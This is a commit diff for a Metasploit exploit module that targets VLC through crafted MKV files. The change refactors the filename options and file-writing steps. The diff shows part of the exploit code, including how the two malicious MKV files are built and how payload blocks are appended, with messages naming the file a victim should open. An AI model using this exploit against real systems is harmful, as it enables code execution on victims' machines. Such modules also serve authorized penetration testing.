Filename options
exploit:vlc_mkv overwrite fileformat filename method to supply optionsGSoC/Meterpreter_Web_Console
parent
94f260f289
commit
1cb8418b2d
|
@ -101,10 +101,12 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
'DisclosureDate' => 'May 24 2018',
|
'DisclosureDate' => 'May 24 2018',
|
||||||
'DefaultTarget' => 1))
|
'DefaultTarget' => 1))
|
||||||
|
|
||||||
register_options([
|
register_options [
|
||||||
OptString.new('FILENAME', [true, 'The file name.', 'msf.mkv']),
|
OptString.new('MKV_ONE', [false, 'mkv that should be opened', '']),
|
||||||
OptString.new('AUX_FILENAME', [true, 'The auxiliary file name.', 'auxi.mkv'])
|
OptString.new('MKV_TWO', [false, 'The auxiliary file name.', ''])
|
||||||
])
|
]
|
||||||
|
|
||||||
|
deregister_options('FILENAME')
|
||||||
end
|
end
|
||||||
|
|
||||||
def to_bytes(num, length, endianess = 'big')
|
def to_bytes(num, length, endianess = 'big')
|
||||||
|
@ -274,22 +276,31 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||||
mkv1, simple_block, count = generate_mkv
|
mkv1, simple_block, count = generate_mkv
|
||||||
mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10)
|
mkv2 = mkv1[0, 0x4f] + "\x15\x49\xa9\x66" + data_size(10)
|
||||||
|
|
||||||
print_status("Creating '#{datastore['FILENAME']}'. This is the file your victim should open.")
|
tmpname = rand_text_alpha_lower(3..8)
|
||||||
file_create(mkv1)
|
f1 = datastore['MKV_ONE'].empty? ? "#{tmpname}-part1.mkv" : datastore['MKV_ONE']
|
||||||
|
f1 << '.mkv' unless f1.downcase.end_with?('.mkv')
|
||||||
|
|
||||||
# Finish writing the payload simple_blocks
|
f2 = datastore['MKV_TWO'].empty? ? "#{tmpname}-part2.mkv" : datastore['MKV_TWO']
|
||||||
print_status("Writing payload blocks")
|
f2 << '.mkv' unless f2.downcase.end_with?('.mkv')
|
||||||
path = File.join(Msf::Config.local_directory, datastore['FILENAME'])
|
|
||||||
|
file_format_filename(f1)
|
||||||
|
file_create(mkv1)
|
||||||
|
print_status("Created #{f1}. Target should open this file")
|
||||||
|
|
||||||
|
file_format_filename(f2)
|
||||||
|
file_create(mkv2)
|
||||||
|
print_status("Created #{f2}. Put this file in the same directory as #{f1}")
|
||||||
|
|
||||||
|
print_status("Appending blocks to #{f1}")
|
||||||
|
path = File.join(Msf::Config.local_directory, f1)
|
||||||
full_path = ::File.expand_path(path)
|
full_path = ::File.expand_path(path)
|
||||||
File.open(full_path, 'ab') do |fd|
|
File.open(full_path, 'ab') do |fd|
|
||||||
count.times { fd.write(simple_block) }
|
count.times { fd.write(simple_block) }
|
||||||
end
|
end
|
||||||
print_good("Payload successfully written")
|
print_good("Succesfuly appended blocks to #{f1}")
|
||||||
|
end
|
||||||
|
|
||||||
original_fname = datastore['FILENAME']
|
def file_format_filename(name = '')
|
||||||
datastore['FILENAME'] = datastore['AUX_FILENAME']
|
name.empty? ? @fname : @fname = name
|
||||||
print_status("Creating '#{datastore['AUX_FILENAME']}'. Put this file in the same directory as the main mkv file")
|
|
||||||
file_create(mkv2)
|
|
||||||
datastore['FILENAME'] = original_fname
|
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue